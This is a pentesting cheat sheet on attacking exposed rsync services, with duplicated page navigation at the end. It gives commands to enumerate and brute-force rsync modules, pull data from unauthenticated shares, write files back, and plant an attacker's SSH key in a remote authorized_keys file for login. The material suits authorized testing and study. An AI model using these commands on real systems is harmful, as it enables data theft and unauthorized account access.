Rsync Pentesting

Rsync is utility for efficiently transferring and synchronizing files between a computer and a storage drive and across networked computers by comparing the modification times and sizes of files. A de

Enumeration

nmap --script rsync-list-modules -p 873 <target-ip>
nmap --script rsync-brute --script-args 'rsync-brute.module=www' <target-ip>

# Banner grabbing and list shared folders
# We can execute commands (modules) that we found, after entering '@RSYNCD: <version>'.
nc -nv <target-ip> 873
@RSYNCD: 31.0
#list
raidroot
Conf
@RSYNCD: EXIT

# List sync data using rsync
rsync <target-ip>::
rsync -av --list-only rsync://<target-ip>

# List sync data using Metasploit
msf> use auxiliary/scanner/rsync/modules_list

When we found the shared folder, check if we can connect without authentication. Assume that we found the “shares” folder.

# Netcat
nc -nv <target-ip> 873
RSYNCD: 31.0
shares
RSYNCD: OK

# Rsync
rsync <target-ip>::shares
rsync -av --list-only rsync://<target-ip>:873/shares

Check Config File

find / -name "rsyncd.conf" 2>/dev/null
cat /path/to/rsyncd.conf

Sync Data

After gathering modules (shared folders), we can sync it with our local folder.

From Remote to Local

We can sync a remote folder with a local folder.

# -a: Arvhice
# -v: Verbose
rsync -av <remote-ip>::<src_dir> <dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
mkdir test_shared
rsync -av <remote-ip>::share test_shared
rsync -av rsync://<remote-ip>:873/share test_shared

If we want to update sync data, modify files in the shared folder then rsync back with “From Local to Remote”.

From Local to Remote

We can sync our local folder with a remote folder.

# -a: Arvhice
# -v: Verbose
rsync -av <src_dir> <remote-ip>::<dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
rsync -av test_shared <remote-ip>::share
rsync -av test_shared rsync://<remote-ip>:873/share

1. Generate a SSH key in local machine

Copy the content of the public key to the authorized_keys.

ssh-keygen -f testkey
cat testkey.pub > authorized_keys

2. Sync the authorized_keys with the remote .ssh directory

rsync authorized_keys rsync://<remote-user>@<remote-ip>:873/<home_user>/.ssh

ssh <remote-home-user>@<remote-ip> -i testkey

PreviousReDoS (Regular Expression Denial of Service)NextTor

Last updated 1 year ago

nmap --script rsync-list-modules -p 873 <target-ip> nmap --script rsync-brute --script-args 'rsync-brute.module=www' <target-ip> # Banner grabbing and list shared folders # We can execute commands (modules) that we found, after entering '@RSYNCD: <version>'. nc -nv <target-ip> 873 @RSYNCD: 31.0 #list raidroot Conf @RSYNCD: EXIT # List sync data using rsync rsync <target-ip>:: rsync -av --list-only rsync://<target-ip> # List sync data using Metasploit msf> use auxiliary/scanner/rsync/modules_list

# -a: Arvhice # -v: Verbose rsync -av <remote-ip>::<src_dir> <dest_dir> # e.g. Assume we found the "share" folder with rsync enumeration. mkdir test_shared rsync -av <remote-ip>::share test_shared rsync -av rsync://<remote-ip>:873/share test_shared

# -a: Arvhice # -v: Verbose rsync -av <src_dir> <remote-ip>::<dest_dir> # e.g. Assume we found the "share" folder with rsync enumeration. rsync -av test_shared <remote-ip>::share rsync -av test_shared rsync://<remote-ip>:873/share

Enumeration

Check Config File

Sync Data

From Remote to Local

From Local to Remote

SSH Key Syncing and SSH Login

1. Generate a SSH key in local machine

2. Sync the authorized_keys with the remote .ssh directory

3. SSH login with the generated private key

Enumeration

Check Config File

Sync Data

From Remote to Local

From Local to Remote

SSH Key Syncing and SSH Login

1. Generate a SSH key in local machine

2. Sync the authorized_keys with the remote .ssh directory

3. SSH login with the generated private key